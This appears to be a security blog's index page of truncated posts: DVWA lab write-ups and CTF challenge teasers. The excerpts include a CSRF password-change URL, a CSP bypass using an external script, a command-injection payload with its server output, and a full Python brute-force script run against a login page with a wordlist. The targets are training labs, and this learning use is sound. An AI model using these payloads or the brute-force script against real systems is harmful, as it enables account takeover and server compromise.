Posts

Description Vulnerability: CSRF Impact: CSRF attack change any accounts’ passwords. LOW Security Level Make a change password request for testing and inspecting the Network I can see the change password request is a GET request with password_new and password_conf params: http://localhost/DVWA/vulnerabilities/csrf/?password_new=123&password_conf=123&Change=Change We can send this URL to trick any users to click on and their accounts’ password will be changed. MEDIUM Security Level In this MEDIUM level, it has a check condition before executing code: ...

Description Vulnerability: CSP Bypass Impact: Bypass CSP policy and inject our desired Javascript code. LOW Security Level This Security Level allow these scripts: $headerCSP = "Content-Security-Policy: script-src 'self' https://pastebin.com hastebin.com www.toptal.com example.com code.jquery.com https://ssl.google-analytics.com https://digi.ninja ;"; // allows js from self, pastebin.com, hastebin.com, jquery, digi.ninja, and google analytics. As it allows https://digi.ninja so we can use https://digi.ninja/dvwa/cookie.js. Result: MEDIUM Security Level The CSP now is new $headerCSP = "Content-Security-Policy: script-src 'self' 'unsafe-inline' 'nonce-TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA=';"; It allows script with nonce: TmV2ZXIgZ29pbmcgdG8gZ2l2ZSB5b3UgdXA= so the payload is: ...

Description Vulnerability: Cryptography Impact: Decode the encoded string to get the correct password. LOW Security Level In the source code this is how decoding process works: $decoded = xor_this (base64_decode ($password), $key); First Base64 Decode the password then decode with XOR and the key is wachtwoord. I use CyberChef to decode this encoded string: Result: Your new password is: Olifant MEDIUM Security Level The tokens are encrypted using an Electronic Code Book based algorithm (AES-128-ECB). aes-128-ebc is a 128 bit block cipher. 128 bits is 16 bytes, but to make things human readable, the bytes are represented as hex characters meaning each byte is two characters. This gives you a block size of 32 characters. ...

Description Vulnerability: Command injection Impact: Get access to server resources through ping function. LOW Security Level This LOW level ping function doesn’t have any filter or regex to check the input we enter for them. Therefore, we can leverage this vulnerability to execute additional commands to the server. Example: 1.1.1.1; id This payload will ping 1.1.1.1 but also run id. The result is: PING 1.1.1.1 (1.1.1.1) 56(84) bytes of data. 64 bytes from 1.1.1.1: icmp_seq=1 ttl=52 time=63.0 ms 64 bytes from 1.1.1.1: icmp_seq=2 ttl=52 time=93.5 ms 64 bytes from 1.1.1.1: icmp_seq=3 ttl=52 time=76.8 ms 64 bytes from 1.1.1.1: icmp_seq=4 ttl=52 time=50.4 ms --- 1.1.1.1 ping statistics --- 4 packets transmitted, 4 received, 0% packet loss, time 3005ms rtt min/avg/max/mdev = 50.401/70.910/93.461/16.016 ms uid=33(www-data) gid=33(www-data) groups=33(www-data) ...

Description Vulnerability: Brute-force Impact: Brute-force and get the admin account credentials. LOW Security Level This is the simple code I created to brute-force the admin account using rockyou.txt password lists. Change PHPSESSID to your own one. import requests baseUrl = "http://localhost/DVWA/vulnerabilities/brute/?Login=Login&username=admin" cookies = { "PHPSESSID": "91fdcd96e5376633ef607edd0a1b8093", "security": "low" } try: with open('/usr/share/wordlists/rockyou.txt') as file: for line in file: password = line.rstrip() url = baseUrl + f"&password={password}" try: print(f"Attempting: password={password}") res = requests.get(url, cookies=cookies) if "Username and/or password incorrect." not in res.text: print() print("=> Password found: ", password) exit() except requests.exceptions.RequestException as e: print("Request error:", e) continue except FileNotFoundError as e: print("File not found:", e) MEDIUM Security Level The only difference between LOW and MEDIUM level is in the Login failed if logic: ...

Description Vulnerability: Authorisation Bypass Impact: Leveraging vulnerabilities to get access to user manager system. LOW Security Level The source code doesn’t have any checks. You can use gordonb / abc123 this account (this is not an admin account). Since the source code doesn’t have any checks so we can just access to the URL: http://localhost/DVWA/vulnerabilities/authbypass/ MEDIUM Security Level The source code now updated with a check: /* Only the admin user is allowed to access this page. Have a look at these two files for possible vulnerabilities: * vulnerabilities/authbypass/get_user_data.php * vulnerabilities/authbypass/change_user_details.php */ if (dvwaCurrentUser() != "admin") { print "Unauthorised"; http_response_code(403); exit; } Let’s take a look at those 2 files, visit get_user_data.php we got: ...

DVWA’s CSRF Challenge This challenge works around a password reset form, enabling admin to change their password. The first three levels can be exploited with these solutions: LOW Security Level: we just need a URL with correct params setup, from that URL make a GET request and we can change the password. MEDIUM Security Level: this level adds a check of Referer header, since it should be the same as where the request originated from, a simple curl command may exploit this level. HIGH Security Level: this is where the game plays, it needs a CSRF token for every request to change the password. This is not so hard to exploit - a Python script can exploit it. For more information: https://github.com/jameskaois/dvwa-vulnerabilities/tree/main/csrf ...

Room / Challenge: Wave Second For Git (Misc) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Wave Second For Git (Misc) Difficulty: Medium Points: 451 Solves: 8 Date: 06-10-2025 Goal We have to get the flag by using Git cli. My Solution Here is the source, you can download it here There is the flag.txt with this content: VzF7ZzF0aHViXw== It is encoded with base64 algorithm, it is easy to decode it, result is the first part of the flag: ...

Room / Challenge: Open Read Flag (Web) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Open Read Flag (web) Target / URL: http://61.28.236.247:10000/ Difficulty: Medium Points: 484 Solves: 5 Date: 06-10-2025 Goal We have to get the flag by leveraging the view file functionality. My Solution Here is the source code, you can download and examine it here The website is simple with just a read file functionality. ...

Room / Challenge: Admin Tồi (Web) Metadata Author: jameskaois CTF: WannaGame Freshman CTF 2025 Challenge: Admin Tồi (web) Target / URL: http://61.28.236.247:9000/ Difficulty: Medium Points: 419 Solves: 10 Date: 06-10-2025 Goal We have to get the flag by leveraging the vuln in authentication feature My Solution Here is the source code, you can download and examine it here This is the home page of the website. Let’s try creating an account and logging in to it to see what we got. ...